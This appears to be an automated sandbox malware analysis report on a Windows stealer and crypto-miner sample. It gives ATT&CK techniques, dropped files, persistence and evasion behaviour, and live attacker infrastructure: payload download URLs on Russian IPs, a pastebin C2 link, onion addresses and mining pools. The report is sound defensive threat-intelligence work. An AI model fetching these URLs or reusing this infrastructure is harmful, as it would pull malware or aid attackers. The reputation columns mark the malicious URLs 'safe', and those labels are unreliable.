                        Source: Yara matchFile source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts21
                        Windows Management Instrumentation                        		1
                        Scripting                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		OS Credential Dumping2
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts3
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        Access Token Manipulation                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory15
                        System Information Discovery                        		Remote Desktop Protocol1
                        Clipboard Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		11
                        Windows Service                        		11
                        Windows Service                        		2
                        Obfuscated Files or Information                        		Security Account Manager331
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Service Execution                        		1
                        Scheduled Task/Job                        		212
                        Process Injection                        		2
                        Software Packing                        		NTDS151
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture1
                        Non-Standard Port                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		LSA Secrets3
                        Process Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input Capture3
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                        Masquerading                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal Capture1
                        Proxy                        		Exfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                        Virtualization/Sandbox Evasion                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Access Token Manipulation                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                        Process Injection                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480049 Sample: 25C1.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 101 xmr-eu2.nanopool.org 2->101 103 xmr-eu1.nanopool.org 2->103 105 pastebin.com 2->105 119 Malicious sample detected (through community Yara rule) 2->119 121 Antivirus / Scanner detection for submitted sample 2->121 123 Multi AV Scanner detection for submitted file 2->123 129 8 other signatures 2->129 10 25C1.exe 5 2->10         started        13 vueqjgslwynd.exe 2->13         started        16 svchost.exe 2->16         started        18 3 other processes 2->18 signatures3 125 DNS related to crypt mining pools 103->125 127 Connects to a pastebin service (likely for C&C) 105->127 process4 file5 91 C:\Users\user\AppData\...\InstallSetup4.exe, PE32 10->91 dropped 93 C:\Users\user\AppData\Local\...\FourthX.exe, PE32+ 10->93 dropped 95 C:\...\288c47bbc1871b439df19ff4df68f076.exe, PE32 10->95 dropped 97 C:\Users\user\AppData\Local\...\25C1.exe.log, CSV 10->97 dropped 20 288c47bbc1871b439df19ff4df68f076.exe 13 10->20         started        23 InstallSetup4.exe 1 26 10->23         started        27 FourthX.exe 1 2 10->27         started        99 C:\Windows\Temp\gbfbijmbpkdw.sys, PE32+ 13->99 dropped 159 Antivirus detection for dropped file 13->159 161 Multi AV Scanner detection for dropped file 13->161 163 Injects code into the Windows Explorer (explorer.exe) 13->163 165 3 other signatures 13->165 29 explorer.exe 13->29         started        31 powershell.exe 13->31         started        33 cmd.exe 13->33         started        35 conhost.exe 13->35         started        37 WerFault.exe 16->37         started        signatures6 process7 dnsIp8 131 Multi AV Scanner detection for dropped file 20->131 133 Detected unpacking (changes PE section rights) 20->133 135 Detected unpacking (overwrites its own PE header) 20->135 145 3 other signatures 20->145 39 288c47bbc1871b439df19ff4df68f076.exe 20->39         started        42 powershell.exe 24 20->42         started        44 WerFault.exe 20->44         started        107 5.42.64.33, 49715, 80 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 23->107 109 185.172.128.109, 49713, 80 NADYMSS-ASRU Russian Federation 23->109 117 2 other IPs or domains 23->117 85 C:\Users\user\AppData\Local\...\INetC.dll, PE32 23->85 dropped 87 C:\Users\user\AppData\...\BroomSetup.exe, PE32 23->87 dropped 46 BroomSetup.exe 2 5 23->46         started        89 C:\ProgramData\...\vueqjgslwynd.exe, PE32+ 27->89 dropped 137 Antivirus detection for dropped file 27->137 139 Adds a directory exclusion to Windows Defender 27->139 48 powershell.exe 23 27->48         started        50 cmd.exe 27->50         started        54 4 other processes 27->54 111 pastebin.com 104.20.3.235, 443, 49708 CLOUDFLARENETUS United States 29->111 113 51.15.58.224, 14433, 49709 OnlineSASFR France 29->113 115 51.195.138.197, 14433, 49707 OVHFR France 29->115 141 Query firmware table information (likely to detect VMs) 29->141 143 Loading BitLocker PowerShell Module 31->143 52 conhost.exe 31->52         started        56 2 other processes 33->56 file9 signatures10 process11 signatures12 147 Found Tor onion address 39->147 58 powershell.exe 39->58         started        61 conhost.exe 42->61         started        149 Antivirus detection for dropped file 46->149 151 Multi AV Scanner detection for dropped file 46->151 63 cmd.exe 1 46->63         started        153 Loading BitLocker PowerShell Module 48->153 65 conhost.exe 48->65         started        67 conhost.exe 50->67         started        69 wusa.exe 50->69         started        71 conhost.exe 50->71         started        73 conhost.exe 54->73         started        75 3 other processes 54->75 process13 signatures14 155 Loading BitLocker PowerShell Module 58->155 77 conhost.exe 58->77         started        157 Uses schtasks.exe or at.exe to add and modify task schedules 63->157 79 conhost.exe 63->79         started        81 schtasks.exe 1 63->81         started        83 chcp.com 1 63->83         started        process15

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        25C1.exe79%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                        25C1.exe100%AviraHEUR/AGEN.1305491
                        25C1.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\BroomSetup.exe100%AviraTR/Drop.Agent.ojaga
                        C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe100%AviraTR/Kryptik.hzhfn
                        C:\Users\user\AppData\Local\Temp\FourthX.exe100%AviraTR/Kryptik.hzhfn
                        C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe100%Joe Sandbox ML
                        C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe91%ReversingLabsWin64.Packed.Generic
                        C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe88%ReversingLabsWin32.Trojan.LummaStealer
                        C:\Users\user\AppData\Local\Temp\BroomSetup.exe75%ReversingLabsWin32.Trojan.Malgent
                        C:\Users\user\AppData\Local\Temp\FourthX.exe91%ReversingLabsWin64.Packed.Generic
                        C:\Users\user\AppData\Local\Temp\InstallSetup4.exe88%ReversingLabsWin32.Trojan.Stealerc
                        C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dll0%ReversingLabs
                        C:\Windows\Temp\gbfbijmbpkdw.sys5%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                        https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr0%Avira URL Cloudsafe
                        http://185.172.128.109/syncUpd.exe0%Avira URL Cloudsafe
                        http://185.172.128.127/syncUpd.exe0%Avira URL Cloudsafe
                        http://yandex.com/bots)Opera0%Avira URL Cloudsafe
                        http://185.172.128.127/i0%Avira URL Cloudsafe
                        http://5.42.64.33/G0%Avira URL Cloudsafe
                        http://5.42.64.33/ping.php?substr=four0%Avira URL Cloudsafe
                        http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion0%Avira URL Cloudsafe
                        http://invalidlog.txtlookup0%Avira URL Cloudsafe
                        http://devlog.gregarius.net/docs/ua)Links0%Avira URL Cloudsafe
                        http://www.broomcleaner.com/buyOpen0%Avira URL Cloudsafe
                        http://grub.org)Mozilla/5.00%Avira URL Cloudsafe
                        http://www.avantbrowser.com)MOT-V9mm/0%Avira URL Cloudsafe
                        https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize0%Avira URL Cloudsafe
                        https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill0%Avira URL Cloudsafe
                        http://185.172.128.109/syncUpd.exehttp://5.42.64.33/ping.php?substr=fourSOFTWARE0%Avira URL Cloudsafe
                        http://185.172.128.109/en-GB0%Avira URL Cloudsafe
                        http://www.bloglines.com)Frame0%Avira URL Cloudsafe
                        http://www.exabot.com/go/robot)Opera/9.800%Avira URL Cloudsafe
                        https://turnitin.com/robot/crawlerinfo.html)cannot0%Avira URL Cloudsafe
                        http://www.googlebot.com/bot.html)Links0%Avira URL Cloudsafe
                        http://www.google.com/bot.html)crypto/ecdh:0%Avira URL Cloudsafe
                        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:0%Avira URL Cloudsafe
                        http://search.msn.com/msnbot.htm)net/http:0%Avira URL Cloudsafe
                        http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.00%Avira URL Cloudsafe
                        http://185.172.128.127/0%Avira URL Cloudsafe
                        http://www.archive.org/details/archive.org_bot)Opera/9.800%Avira URL Cloudsafe
                        https://blockstream.info/apiinva0%Avira URL Cloudsafe
                        http://search.msn.com/msnbot.htm)msnbot/1.10%Avira URL Cloudsafe
                        http://www.baidu.com/search/spider.htm)MobileSafari/600.1.40%Avira URL Cloudsafe
                        http://yandex.com/bots)Opera/9.510%Avira URL Cloudsafe
                        http://www.spidersoft.com)0%Avira URL Cloudsafe
                        http://185.172.128.90/cpa/ping.php?substr=four&s=ab/SILENT/TOSTACK/NOCANCELget0%Avira URL Cloudsafe
                        http://www.google.com/bot.html)Mozilla/5.00%Avira URL Cloudsafe
                        http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
                        http://185.172.128.90/cpa/ping.php?substr=four&s=abG0%Avira URL Cloudsafe
                        http://185.172.128.90/cpa/ping.php?substr=four&s=ab0%Avira URL Cloudsafe
                        http://5.42.64.33/ing.php?substr=fourh0%Avira URL Cloudsafe
                        http://archive.org/details/archive.org_bot)Mozilla/5.00%Avira URL Cloudsafe
                        http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionC:0%Avira URL Cloudsafe
                        http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency0%Avira URL Cloudsafe
                        http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i50%Avira URL Cloudsafe
                        http://www.google.c0%Avira URL Cloudsafe
                        http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD0%Avira URL Cloudsafe
                        http://www.google.com/feedfetcher.html)HKLM0%Avira URL Cloudsafe
                        http://crl.g0%Avira URL Cloudsafe
                        http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
                        http://185.172.128.90/cpa/ping.php?substr=four&s=abt0%Avira URL Cloudsafe
                        https://blockchain.infoindex0%Avira URL Cloudsafe
                        https://pastebin.com/raw/2HQ8Rbid0%Avira URL Cloudsafe
                        http://185.172.128.109/syncUpd.exe_0%Avira URL Cloudsafe
                        http://localhost:3433/https://duniadekho.baridna:0%Avira URL Cloudsafe
                        http://search.msn.com/msnbot.htm)pkcs7:0%Avira URL Cloudsafe
                        http://www.alexa.com/help/webmasters;0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        pastebin.com
                        		104.20.3.235
                        		truetrue
                          		unknown
                          xmr-eu1.nanopool.org
                          		51.15.193.130
                          		truetrue
                            		unknown
                            xmr-eu2.nanopool.org
                            		51.68.137.186
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://185.172.128.109/syncUpd.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://5.42.64.33/ping.php?substr=fourfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.127/syncUpd.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.90/cpa/ping.php?substr=four&s=abfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pastebin.com/raw/2HQ8Rbidfalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://185.172.128.127/iInstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://invalidlog.txtlookup288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://yandex.com/bots)Opera288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://5.42.64.33/GInstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://devlog.gregarius.net/docs/ua)Links288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.broomcleaner.com/buyOpenBroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://grub.org)Mozilla/5.0288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.avantbrowser.com)MOT-V9mm/288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.109/syncUpd.exehttp://5.42.64.33/ping.php?substr=fourSOFTWAREInstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.109/en-GBInstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://turnitin.com/robot/crawlerinfo.html)cannot288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.exabot.com/go/robot)Opera/9.80288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bloglines.com)Frame288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.googlebot.com/bot.html)Links288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://search.msn.com/msnbot.htm)net/http:288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.google.com/bot.html)crypto/ecdh:288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:288c47bbc1871b439df19ff4df68f076.exetrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://search.msn.com/msnbot.htm)msnbot/1.1288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.127/InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://blockstream.info/apiinva288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.archive.org/details/archive.org_bot)Opera/9.80288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://yandex.com/bots)Opera/9.51288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.spidersoft.com)288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.google.com/bot.html)Mozilla/5.0288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.90/cpa/ping.php?substr=four&s=ab/SILENT/TOSTACK/NOCANCELgetInstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://nsis.sf.net/NSIS_ErrorErrorInstallSetup4.exe, 00000003.00000000.1359934275.000000000040A000.00000008.00000001.01000000.00000007.sdmp, InstallSetup4.exe, 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://185.172.128.90/cpa/ping.php?substr=four&s=abGInstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://https://_bad_pdb_file.pdb288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://archive.org/details/archive.org_bot)Mozilla/5.0288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://5.42.64.33/ing.php?substr=fourhInstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionC:288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C0A0000.00000004.00001000.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.google.c288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.google.com/feedfetcher.html)HKLM288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i5288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.90/cpa/ping.php?substr=four&s=abtInstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.g288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://blockchain.infoindex288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.avantbrowser.com)MOT-V9mm/00.62288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://185.172.128.109/syncUpd.exe_InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://localhost:3433/https://duniadekho.baridna:288c47bbc1871b439df19ff4df68f076.exetrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://search.msn.com/msnbot.htm)pkcs7:288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.alexa.com/help/webmasters;288c47bbc1871b439df19ff4df68f076.exefalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.172.128.90
                              		unknownRussian Federation
                              		50916NADYMSS-ASRUfalse
                              104.20.3.235
                              		pastebin.comUnited States
                              		13335CLOUDFLARENETUStrue
                              51.15.58.224
                              		unknownFrance
                              		12876OnlineSASFRfalse
                              185.172.128.127
                              		unknownRussian Federation
                              		50916NADYMSS-ASRUfalse
                              51.195.138.197
                              		unknownFrance
                              		16276OVHFRfalse
                              5.42.64.33
                              		unknownRussian Federation
                              		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
                              185.172.128.109
                              		unknownRussian Federation
                              		50916NADYMSS-ASRUfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1480049
                              Start date and time:2024-07-24 14:30:15 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 13m 11s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:48
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:25C1.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.mine.winEXE@67/30@3/7
                              EGA Information:
                              • Successful, ratio: 87.5%
                              HCA Information:
                              • Successful, ratio: 88%
                              • Number of executed functions: 111
                              • Number of non-executed functions: 62
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target 25C1.exe, PID 7600 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: 25C1.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:31:08API Interceptor1x Sleep call for process: FourthX.exe modified
                              08:31:12API Interceptor8x Sleep call for process: 288c47bbc1871b439df19ff4df68f076.exe modified
                              08:31:12API Interceptor77x Sleep call for process: powershell.exe modified
                              13:31:13Task SchedulerRun new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.172.128.90LOn3Ws0C6v.exeGet hashmaliciousUnknownBrowse
                              • 185.172.128.90/cpa/ping.php?substr=five&s=ab
                              LOn3Ws0C6v.exeGet hashmaliciousUnknownBrowse
                              • 185.172.128.90/cpa/ping.php?substr=five&s=ab
                              5oXJ4R0xsz.exeGet hashmaliciousGCleaner, NymaimBrowse
                              • 185.172.128.90/cpa/name.php
                              SecuriteInfo.com.Win32.CrypterX-gen.21396.26717.exeGet hashmaliciousGCleaner, NymaimBrowse
                              • 185.172.128.90/cpa/name.php
                              4bMOQM5bBW.exeGet hashmaliciousGCleaner, NymaimBrowse
                              • 185.172.128.90/cpa/name.php
                              38vkspMDH4.exeGet hashmaliciousGCleaner, NymaimBrowse
                              • 185.172.128.90/cpa/name.php
                              zv0DDKbje3.exeGet hashmaliciousGCleaner, NymaimBrowse
                              • 185.172.128.90/cpa/name.php
                              kyaOzGMoxp.exeGet hashmaliciousGCleaner, NymaimBrowse
                              • 185.172.128.90/cpa/name.php
                              SecuriteInfo.com.Trojan.005afea61.15178.32092.exeGet hashmaliciousGCleanerBrowse
                              • 185.172.128.90/cpa/ping.php?substr=one&s=two
                              SecuriteInfo.com.Win32.CrypterX-gen.24228.21937.exeGet hashmaliciousGCleanerBrowse
